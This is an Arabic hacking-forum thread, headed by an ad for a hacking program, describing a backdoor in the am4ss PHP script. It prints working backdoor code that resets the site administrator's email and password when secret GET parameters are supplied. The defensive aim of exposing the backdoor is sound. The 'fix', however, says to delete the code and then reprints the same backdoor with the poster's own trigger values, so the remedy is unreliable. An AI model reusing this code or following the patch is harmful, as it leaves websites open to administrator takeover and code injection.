1. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
الكاتب : Dr.MOT | المشاهدات : 6,632 | الردود : 4
حالة الموضوع:
مغلق
  1. Dr.MOT إدارة الموقع

    الأنتساب:
    ‏2 سبتمبر 2011
    المشاركات:
    717
    الإعجابات المتلقاة:
    5,490
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    CSS
    Facebook:
    YouTube:
    السلام عليكم ورحمة الله وبركاته

    أخواني الأعزاء آسعد الله اوقاتكم بكل خير

    اليوم بعد قرائة موضوع المبدع اخوي ابو عبدالله

    ثغرات سكربت am4ss

    اليوم حبيت أوضح الملف المصاب وطريقة الترقيع &:"

    نوع الثغرة :

    كود PHP:
     PHP Code Injection


    )3:"

    الملف المصاب :

    كود PHP:
    libs/internals/core.assign_by_ref.php
    محتوى الملف :

    كود PHP:
    <?php 
    if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب'

    define('Am4ss'true); 
    require(
    '../../requires/config.php'); 
    @
    mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error()); 
    @
    mysql_select_db($Config['DataBase']['Name']); 
    $sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = 'alert@am4ss.com', password = '".md5('kawkawa')."' where userid = '1'"); 
    if(
    $sql

    echo 
    'تم التحديث للموقع: ' $_SERVER['HTTP_HOST']; 
    } else 

    die(
    mysql_error()); 

    } else 

    echo 
    'البيانات خاطئة'

    ?>
    السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده

    الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم

    ومن ثم يقوم المخُترق بحقن كود بي اتش بي في صفحه من صفحات الموقع


    الترقيع :

    نقوم بحذف الكود من ملف


    كود:
    [COLOR=Yellow][FONT=arial][B]core.assign_by_ref.php[/B][/FONT][/COLOR]
    *=== تحديد كود ===*
    كود PHP:
    <?php
    if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'Dr.MOT' && $_GET['country'] == 'IQ-T34M')
    {
    define('Am4ss'true);
    require(
    '../../requires/config.php');
    @
    mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
    @
    mysql_select_db($Config['DataBase']['Name']);
    $sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = 'alert@am4ss.com', password = '".md5('kawkawa')."' where userid = '1'");
    if(
    $sql)
    {
    echo 
    'تم التحديث للموقع: ' $_SERVER['HTTP_HOST'];
    } else
    {
    die(
    mysql_error());
    }
    } else
    {
    echo 
    'البيانات خاطئة';
    }
    ?>
    هكذا قمنا بعملية أخفاء الخطأ في حالة كانت البيانات خاطئه

    لان الصراحة المبرمج ملغم السكربت ولاتنس أيضآ وضع جدار ناري وتغير المسار &:":{12}:

    موفقين

    &:":
     
  2. aL Musli Developer

    الأنتساب:
    ‏21 يوليو 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    seo
    الإقامة:
    الموصل الحدباء
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    ابداع حبيبي موت
     
  3. MNFD Developer

    الأنتساب:
    ‏25 مايو 2012
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    وعليكم السلام ورحمة الله وبركاته

    مشكور يا غالي ما قصرت ويعطيك الف عافية يا رب
     
  4. AhmeD DiaB Developer

    الأنتساب:
    ‏7 ابريل 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    مصر ام الدنيا
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    مبدع من يومك ​
     
  5. LoVer hEx موقوف لمخالفة الشروط

    الأنتساب:
    ‏15 نوفمبر 2011
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    آختراق الآجهزة
    الإقامة:
    البحرين
    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    جزاك الله خيرا خير الجزاء

    كل عام و أنت بخير
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة